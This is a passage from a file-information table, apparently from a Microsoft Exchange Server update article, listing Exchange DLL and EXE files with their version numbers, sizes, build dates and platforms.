\nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.2.986.14| 175,504| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.2.986.14| 2,793,336| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.2.986.14| 53,136| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.2.986.14| 151,440| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.2.986.14| 967,048| 3-Nov-21| 20:05| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.2.986.14| 185,232| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.2.986.11| 31,632| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.2.986.14| 39,800| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.2.986.14| 105,872| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.2.986.14| 95,120| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.2.986.14| 43,408| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.2.986.13| 18,832| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.2.986.14| 172,936| 3-Nov-21| 20:06| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.2.986.14| 102,264| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.2.986.14| 98,704| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.2.986.14| 188,816| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.2.986.14| 43,384| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.2.986.11| 447,376| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.2.986.14| 89,976| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.2.986.14| 107,896| 3-Nov-21| 21:28| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.2.986.14| 371,088| 3-Nov-21| 20:12| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.2.986.14| 193,912| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.2.986.14| 551,816| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.2.986.11| 16,264| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.2.986.11| 15,736| 3-Nov-21| 18:18| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.2.986.14| 320,888| 3-Nov-21| 20:04| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.2.986.11| 17,784| 3-Nov-21| 18:18| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.2.986.14| 45,456| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.2.986.14| 18,312| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.2.986.11| 12,680| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.2.986.11| 20,856| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.2.986.14| 415,112| 3-Nov-21| 19:32| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.2.986.13| 1,269,624| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.2.986.14| 41,848| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.2.986.11| 433,536| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.2.986.14| 4,567,952| 3-Nov-21| 22:14| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.2.986.13| 260,984| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.2.986.11| 33,680| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.2.986.14| 94,072| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.management.deployment.dll| 15.2.986.14| 588,680| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.2.986.11| 3,544,448| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.2.986.14| 67,960| 3-Nov-21| 20:47| x86 \nMicrosoft.exchange.management.dll| 15.2.986.14| #########| 3-Nov-21| 20:20| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.2.986.14| 58,760| 3-Nov-21| 20:29| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.2.986.14| 23,952| 3-Nov-21| 20:32| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.2.986.14| 101,768| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.management.migration.dll| 15.2.986.14| 544,136| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.management.mobility.dll| 15.2.986.14| 305,016| 3-Nov-21| 20:30| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.2.986.11| 273,800| 3-Nov-21| 18:14| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.2.986.14| 418,696| 3-Nov-21| 20:27| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.2.986.14| 275,856| 3-Nov-21| 20:35| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.2.986.14| 70,536| 3-Nov-21| 20:38| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.2.986.14| 7,878,536| 3-Nov-21| 19:03| x86 \nMicrosoft.exchange.management.recipient.dll| 15.2.986.14| 1,501,560| 3-Nov-21| 20:31| x86 \nMicrosoft.exchange.management.snapin.esm.dll| 15.2.986.14| 71,560| 3-Nov-21| 20:29| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.2.986.14| 1,301,368| 3-Nov-21| 20:24| x86 \nMicrosoft.exchange.management.transport.dll| 15.2.986.14| 1,875,856| 3-Nov-21| 20:36| x86 \nMicrosoft.exchange.managementgui.dll| 15.2.986.14| 5,366,672| 3-Nov-21| 18:53| x86 \nMicrosoft.exchange.managementmsg.dll| 15.2.986.11| 36,216| 3-Nov-21| 18:14| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.2.986.14| 117,640| 3-Nov-21| 18:24| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.2.986.14| 209,800| 3-Nov-21| 20:27| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.2.986.14| 79,760| 3-Nov-21| 19:04| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.2.986.11| 17,272| 3-Nov-21| 18:14| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.2.986.14| 156,048| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.2.986.14| 65,912| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.2.986.11| 30,592| 3-Nov-21| 18:18| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.2.986.14| 58,256| 3-Nov-21| 19:54| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.2.986.14| 29,576| 3-Nov-21| 20:02| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.2.986.14| 175,480| 3-Nov-21| 20:04| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.2.986.14| 28,560| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.2.986.14| 75,152| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.2.986.14| 206,200| 3-Nov-21| 20:04| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.2.986.14| 440,696| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.2.986.14| 83,344| 3-Nov-21| 20:02| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.2.986.14| 35,192| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.2.986.14| 53,136| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.2.986.14| 96,632| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.migration.dll| 15.2.986.14| 1,109,896| 3-Nov-21| 20:04| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.2.986.11| 14,712| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.mitigation.service.eventlog.dll| 15.2.986.11| 13,176| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.mitigation.service.exe| 15.2.986.14| 81,808| 3-Nov-21| 20:41| x86 \nMicrosoft.exchange.mobiledriver.dll| 15.2.986.14| 135,568| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.2.986.14| 5,064,584| 3-Nov-21| 21:21| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.2.986.14| 19,840| 3-Nov-21| 18:53| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.2.986.14| 68,488| 3-Nov-21| 18:24| x86 \nMicrosoft.exchange.net.dll| 15.2.986.14| 5,085,584| 3-Nov-21| 18:18| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.2.986.14| 265,592| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.networksettings.dll| 15.2.986.14| 37,752| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.2.986.11| 14,216| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.2.986.14| 549,264| 3-Nov-21| 21:11| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.2.986.14| 22,928| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.2.986.14| 106,376| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.oauth.core.dll| 15.2.986.11| 291,720| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.2.986.11| 17,272| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.2.986.14| 277,880| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.odata.dll| 15.2.986.14| 2,995,064| 3-Nov-21| 21:07| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.2.986.14| 91,528| 3-Nov-21| 19:21| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.2.986.14| 101,752| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.2.986.14| 38,280| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.2.986.14| 45,448| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.2.986.14| 58,256| 3-Nov-21| 19:43| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.2.986.14| 147,336| 3-Nov-21| 19:39| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.2.986.14| 26,488| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.2.986.14| 183,176| 3-Nov-21| 19:32| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.2.986.14| 26,512| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.2.986.14| 38,280| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.2.986.14| 55,688| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.2.986.14| 147,336| 3-Nov-21| 19:32| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.2.986.14| 191,880| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.2.986.14| 33,656| 3-Nov-21| 19:41| x86 \nMicrosoft.exchange.partitioncache.dll| 15.2.986.13| 28,040| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.2.986.14| 32,632| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.2.986.14| 15,248| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.2.986.11| 17,288| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.2.986.11| 17,288| 3-Nov-21| 18:13| Not applicable \nMicrosoft.exchange.pop3.exe| 15.2.986.14| 106,888| 3-Nov-21| 19:39| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.2.986.14| 106,888| 3-Nov-21| 19:39| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.2.986.14| 24,968| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.2.986.14| 24,968| 3-Nov-21| 19:37| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.2.986.14| 42,872| 3-Nov-21| 18:23| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.2.986.14| 262,544| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.2.986.14| 262,544| 3-Nov-21| 19:37| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.2.986.11| 357,776| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.2.986.14| 4,168,056| 3-Nov-21| 20:39| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.2.986.14| 308,600| 3-Nov-21| 20:40| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.2.986.14| 41,360| 3-Nov-21| 20:40| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.2.986.14| 30,608| 3-Nov-21| 19:32| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.2.986.14| 136,064| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.2.986.14| 441,728| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.2.986.11| 14,200| 3-Nov-21| 18:14| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.2.986.14| 224,648| 3-Nov-21| 20:31| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.2.986.14| 105,848| 3-Nov-21| 20:22| x86 \nMicrosoft.exchange.pst.dll| 15.2.986.11| 168,824| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.2.986.11| 168,824| 3-Nov-21| 18:11| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.2.986.13| 259,464| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.publicfolders.dll| 15.2.986.14| 72,080| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.2.986.11| 215,944| 3-Nov-21| 18:11| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.2.986.14| 106,888| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.2.986.14| 425,360| 3-Nov-21| 19:39| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.2.986.14| 70,544| 3-Nov-21| 19:42| x86 \nMicrosoft.exchange.query.analysis.dll| 15.2.986.14| 46,472| 3-Nov-21| 20:05| x86 \nMicrosoft.exchange.query.configuration.dll| 15.2.986.14| 215,952| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.query.core.dll| 15.2.986.14| 168,840| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.query.ranking.dll| 15.2.986.14| 343,416| 3-Nov-21| 20:05| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.2.986.14| 174,472| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.2.986.14| 95,120| 3-Nov-21| 20:04| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.2.986.14| 127,352| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.relevance.core.dll| 15.2.986.11| 63,376| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.relevance.data.dll| 15.2.986.14| 36,752| 3-Nov-21| 19:15| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.2.986.14| 17,784| 3-Nov-21| 18:53| x64 \nMicrosoft.exchange.relevance.people.dll| 15.2.986.14| 9,666,936| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.2.986.14| #########| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.2.986.14| 36,744| 3-Nov-21| 18:25| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.2.986.11| 97,672| 3-Nov-21| 18:11| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.2.986.14| 28,536| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.2.986.11| 72,080| 3-Nov-21| 18:11| x64 \nMicrosoft.exchange.routing.client.dll| 15.2.986.14| 15,752| 3-Nov-21| 18:24| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.2.986.11| 13,176| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.routing.server.exe| 15.2.986.14| 58,744| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.rpc.dll| 15.2.986.14| 1,692,048| 3-Nov-21| 18:23| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.2.986.14| 209,808| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.2.986.14| 60,280| 3-Nov-21| 18:59| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.2.986.14| 517,512| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.2.986.14| 160,648| 3-Nov-21| 18:53| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.2.986.14| 723,320| 3-Nov-21| 18:18| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.2.986.14| 243,064| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.2.986.11| 20,872| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.2.986.14| 35,200| 3-Nov-21| 20:27| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.2.986.14| 42,384| 3-Nov-21| 19:41| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.2.986.14| 56,208| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.2.986.11| 27,536| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.rules.common.dll| 15.2.986.14| 130,440| 3-Nov-21| 18:44| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.2.986.11| 14,736| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.2.986.14| 20,360| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.safehtml.dll| 15.2.986.11| 21,392| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.2.986.11| 267,640| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.2.986.13| 110,992| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.2.986.11| 112,528| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.2.986.11| 622,472| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.2.986.14| 184,720| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.2.986.11| 12,160| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.2.986.13| 19,344| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.search.core.dll| 15.2.986.14| 211,336| 3-Nov-21| 19:33| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.2.986.14| 17,808| 3-Nov-21| 20:09| x86 \nMicrosoft.exchange.search.engine.dll| 15.2.986.14| 97,680| 3-Nov-21| 19:43| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.2.986.14| 16,760| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.search.fast.dll| 15.2.986.14| 436,608| 3-Nov-21| 19:41| x86 \nMicrosoft.exchange.search.files.dll| 15.2.986.14| 274,320| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.search.flighting.dll| 15.2.986.14| 24,952| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.search.mdb.dll| 15.2.986.14| 217,464| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.search.service.exe| 15.2.986.14| 26,512| 3-Nov-21| 19:44| x86 \nMicrosoft.exchange.security.applicationencryption.dll| 15.2.986.14| 221,064| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.security.dll| 15.2.986.14| 1,558,904| 3-Nov-21| 19:32| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.2.986.14| 19,848| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.2.986.11| 28,544| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.2.986.14| 225,168| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.2.986.14| 5,151,120| 3-Nov-21| 18:53| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.2.986.14| 214,928| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.2.986.14| 115,600| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.2.986.14| 82,808| 3-Nov-21| 18:53| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.2.986.11| 80,784| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.2.986.14| 66,448| 3-Nov-21| 19:39| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.2.986.14| 81,272| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.2.986.14| 211,856| 3-Nov-21| 19:44| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.2.986.14| 1,338,744| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.2.986.14| 511,352| 3-Nov-21| 19:54| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.2.986.14| 47,504| 3-Nov-21| 19:44| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.2.986.14| 873,864| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.2.986.14| 1,352,592| 3-Nov-21| 18:54| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.2.986.14| 30,600| 3-Nov-21| 18:53| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.2.986.14| 130,448| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.2.986.14| 1,018,232| 3-Nov-21| 19:41| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.2.986.14| 111,496| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.2.986.14| 34,680| 3-Nov-21| 18:53| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.2.986.11| 19,328| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.2.986.11| 14,728| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.servicehost.exe| 15.2.986.14| 60,808| 3-Nov-21| 19:44| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.2.986.14| 50,552| 3-Nov-21| 19:32| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.2.986.11| 14,208| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.2.986.11| 14,224| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.services.common.dll| 15.2.986.14| 74,104| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.services.dll| 15.2.986.14| 8,480,632| 3-Nov-21| 20:46| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.2.986.11| 30,088| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.2.986.14| 633,720| 3-Nov-21| 20:58| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.2.986.14| 1,651,064| 3-Nov-21| 20:50| x86 \nMicrosoft.exchange.services.json.dll| 15.2.986.14| 296,336| 3-Nov-21| 20:54| x86 \nMicrosoft.exchange.services.messaging.dll| 15.2.986.14| 43,400| 3-Nov-21| 20:48| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.2.986.14| 232,848| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.services.surface.dll| 15.2.986.14| 178,576| 3-Nov-21| 20:56| x86 \nMicrosoft.exchange.services.wcf.dll| 15.2.986.14| 348,552| 3-Nov-21| 20:51| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.2.986.13| 56,720| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.2.986.13| 96,144| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.setup.common.dll| 15.2.986.14| 297,848| 3-Nov-21| 20:48| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.2.986.14| 35,720| 3-Nov-21| 20:29| x86 \nMicrosoft.exchange.setup.console.dll| 15.2.986.14| 27,000| 3-Nov-21| 20:52| x86 \nMicrosoft.exchange.setup.gui.dll| 15.2.986.14| 116,600| 3-Nov-21| 20:51| x86 \nMicrosoft.exchange.setup.parser.dll| 15.2.986.14| 54,136| 3-Nov-21| 20:25| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.2.986.11| 75,128| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.2.986.14| 142,736| 3-Nov-21| 19:32| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.2.986.14| 24,968| 3-Nov-21| 18:24| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.2.986.11| 15,224| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.sharedcache.exe| 15.2.986.14| 58,752| 3-Nov-21| 19:32| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.2.986.13| 27,008| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.2.986.11| 46,968| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.sqm.dll| 15.2.986.13| 46,992| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.store.service.exe| 15.2.986.14| 28,048| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.store.worker.exe| 15.2.986.14| 26,512| 3-Nov-21| 20:02| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.2.986.11| 13,696| 3-Nov-21| 18:18| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.2.986.14| 31,624| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.storeprovider.dll| 15.2.986.14| 1,205,128| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.structuredquery.dll| 15.2.986.11| 158,608| 3-Nov-21| 18:11| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.2.986.14| 628,112| 3-Nov-21| 20:10| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.2.986.11| 13,192| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.2.986.14| 16,248| 3-Nov-21| 20:24| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.2.986.11| 13,176| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.textprocessing.dll| 15.2.986.14| 221,584| 3-Nov-21| 18:32| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.2.986.11| 13,712| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.2.986.14| 29,048| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.2.986.14| 138,104| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.2.986.14| 21,880| 3-Nov-21| 18:31| x86 